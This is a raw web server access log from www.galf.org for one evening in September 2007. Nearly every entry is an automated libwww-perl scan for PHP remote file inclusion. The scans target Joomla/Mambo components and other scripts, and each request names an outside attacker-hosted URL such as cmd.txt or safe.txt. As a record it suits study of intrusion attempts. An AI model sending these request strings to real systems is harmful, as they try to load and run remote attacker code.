74.124.198.61 - - [16/Sep/2007:21:59:20 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:21:59:20 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.124.198.61 - - [16/Sep/2007:21:59:20 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.61.203.236 - - [16/Sep/2007:21:59:39 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.61.203.236 - - [16/Sep/2007:21:59:39 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.yesevent.org/tmp/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.31 - - [16/Sep/2007:22:00:59 -0700] "GET //skin/zero_vote/error.php?dir=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:01:13 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.126.237.102 - - [16/Sep/2007:22:01:13 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.37.212.31 - - [16/Sep/2007:22:01:35 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [16/Sep/2007:22:01:35 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.186.130 - - [16/Sep/2007:22:01:55 -0700] "GET //index.php?id=&page=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:02:14 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.21.73.27 - - [16/Sep/2007:22:02:50 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:04:01 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:04:38 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:04:39 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.126.237.102 - - [16/Sep/2007:22:04:39 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:05:16 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.76.191.234 - - [16/Sep/2007:22:05:16 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:05:16 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:05:16 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.76.191.234 - - [16/Sep/2007:22:05:17 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.37.212.31 - - [16/Sep/2007:22:08:01 -0700] "GET /logs/index.php?action=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.37.212.31 - - [16/Sep/2007:22:08:01 -0700] "GET /index.php?action=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.13.248.15 - - [16/Sep/2007:22:08:34 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pucorp.t5.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:22:09:00 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.124.198.61 - - [16/Sep/2007:22:09:00 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.37.212.31 - - [16/Sep/2007:22:09:04 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [16/Sep/2007:22:09:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:09:40 -0700] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.21.73.27 - - [16/Sep/2007:22:10:01 -0700] "GET /logs/access.log/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.73.27 - - [16/Sep/2007:22:10:01 -0700] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:10:41 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:10:42 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.37.212.31 - - [16/Sep/2007:22:11:26 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [16/Sep/2007:22:11:26 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
65.126.237.102 - - [16/Sep/2007:22:13:24 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:13:29 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.79.31.97 - - [16/Sep/2007:22:13:58 -0700] "GET /logs/index2.php?x=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.79.31.97 - - [16/Sep/2007:22:13:59 -0700] "GET /index2.php?x=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.79.31.97 - - [16/Sep/2007:22:14:08 -0700] "GET /logs/index2.php?x=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
194.79.31.97 - - [16/Sep/2007:22:14:09 -0700] "GET /index2.php?x=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:14:46 -0700] "GET /logs/access_070611.log//modules/agendax/addevent.inc.php?agendax_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.126.237.102 - - [16/Sep/2007:22:14:46 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:14:46 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.24.154 - - [16/Sep/2007:22:18:52 -0700] "GET //index.php?id=&lang=http://nogglenk.com/ngk.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:19:05 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.126.237.102 - - [16/Sep/2007:22:19:05 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:19:06 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:20:59 -0700] "GET /logs/access_070716.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.58 - - [16/Sep/2007:22:21:27 -0700] "GET //skin/zero_vote/error.php?dir=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.28.215 - - [16/Sep/2007:22:22:46 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:22:47 -0700] "GET /logs/access_070827.log//modules/agendax/addevent.inc.php?agendax_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:22:54 -0700] "GET /logs/access_070827.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.126.237.102 - - [16/Sep/2007:22:22:54 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:22:54 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:22:56 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.67.2.208 - - [16/Sep/2007:22:25:11 -0700] "GET /test.php?page=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.13.248.15 - - [16/Sep/2007:22:26:40 -0700] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pucorp.t5.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.248.15 - - [16/Sep/2007:22:26:40 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://pucorp.t5.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.80.193.33 - - [16/Sep/2007:22:26:53 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=23&ct=result HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312460)"
82.128.18.187 - - [16/Sep/2007:22:28:15 -0700] "GET /logs/access.log HTTP/1.1" 200 89626 "http://www.google.com.ng/search?q=new-scam.com&hl=en&start=20&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
72.37.212.31 - - [16/Sep/2007:22:31:09 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.37.212.31 - - [16/Sep/2007:22:31:09 -0700] "GET /modules/My_eGallery/index.php?basepath=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.146.86.2 - - [16/Sep/2007:22:31:46 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.146.86.2 - - [16/Sep/2007:22:31:46 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:22:36:00 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:22:36:00 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:22:36:09 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:22:36:09 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.18.233.58 - - [16/Sep/2007:22:37:51 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.58 - - [16/Sep/2007:22:37:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:22:38:48 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.5.51.70 - - [16/Sep/2007:22:38:48 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:22:41:29 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:22:41:29 -0700] "GET /modules/My_eGallery/index.php?basepath=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
208.80.193.35 - - [16/Sep/2007:22:41:42 -0700] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=47&ct=result HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20021028)" "www.galf.org"
74.6.24.152 - - [16/Sep/2007:22:43:56 -0700] "GET /?M=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:46:52 -0700] "GET /logs/access.log//modules/agendax/addevent.inc.php?agendax_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:46:52 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.126.237.102 - - [16/Sep/2007:22:46:53 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:22:47:40 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.124.198.61 - - [16/Sep/2007:22:47:40 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://jkjk.site.voila.fr/CMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.32.66.186 - - [16/Sep/2007:22:49:57 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://pa0l0362.iitalia.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.32.66.186 - - [16/Sep/2007:22:49:57 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://pa0l0362.iitalia.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:22:50:57 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:22:50:57 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
164.81.22.52 - - [16/Sep/2007:22:52:06 -0700] "GET /logs/index.php?go=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
164.81.22.52 - - [16/Sep/2007:22:52:07 -0700] "GET /index.php?go=http://72.143.157.159/x.asc/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:52:40 -0700] "GET /logs/access_070625.log//modules/agendax/addevent.inc.php?agendax_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.86.234.242 - - [16/Sep/2007:22:52:56 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freewebtown.com/v3nom/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.86.234.242 - - [16/Sep/2007:22:52:56 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freewebtown.com/v3nom/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
70.86.234.242 - - [16/Sep/2007:22:52:56 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freewebtown.com/v3nom/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:54:00 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.126.237.102 - - [16/Sep/2007:22:54:00 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:54:00 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.233.58 - - [16/Sep/2007:22:55:22 -0700] "GET /logs/access_070820.log//skin/zero_vote/error.php?dir=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:22:55:52 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:22:55:53 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:58:06 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.126.237.102 - - [16/Sep/2007:22:58:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:22:58:44 -0700] "GET /logs/middle.php?file=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:22:58:44 -0700] "GET /middle.php?file=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.11.227.124 - - [16/Sep/2007:22:58:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.227.124 - - [16/Sep/2007:22:58:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:23:01:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
206.174.196.12 - - [16/Sep/2007:23:01:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://3sk3nt.xpg.com.br/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.225.169.73 - - [16/Sep/2007:23:03:37 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
